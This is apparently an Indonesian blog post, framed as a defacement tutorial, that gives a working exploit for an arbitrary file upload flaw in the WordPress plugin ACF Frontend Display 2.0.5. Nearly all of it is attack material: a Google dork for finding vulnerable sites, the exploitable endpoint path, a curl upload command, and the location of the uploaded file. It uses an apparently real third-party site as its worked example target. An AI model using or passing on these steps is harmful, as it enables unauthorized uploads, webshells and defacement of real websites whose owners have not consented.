Home / Hacking / Tutorial / [DEFACE] Cara Deface Dengan Plugin ACF Frontend Display 2.0.5 - WordPress Arbitrary File Upload

Minggu, 25 Desember 2016

[DEFACE] Cara Deface Dengan Plugin ACF Frontend Display 2.0.5 - WordPress Arbitrary File Upload

Author - Unknown Date - 09.14 Hacking Tutorial

# WordPress Plugin ACF Frontend Display 2.0.5 - Arbitrary File Upload
# 30 - 11 - 2016
# N45HT - ShinChan

Google Dork : inurl:"/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/"
Exploit : target.com/[path]/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php
File Path : target.com/[path]/wp-content/uploads/uigen_[tahun_upload]/file.php

vuln
- PoC :
  - curl -k -X POST -F "action=upload" -F "files=/direktori file/" "target.com/[path]/exploit"
  - Contoh : curl -k -X POST -F "action=upload" -F "files=@/home/administrator/Desktop/po.jpg" "plataforma.proyectoitaca.co/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"
sukses!
- File Path : target.com/[path]/wp-content/uploads/uigen_[tahun_upload]/file.php
  Contoh : http://plataforma.proyectoitaca.co/wp-content/uploads/uigen_2016/po.jpg

0 komentar

Posting Komentar

Langganan: Posting Komentar (Atom)

TOP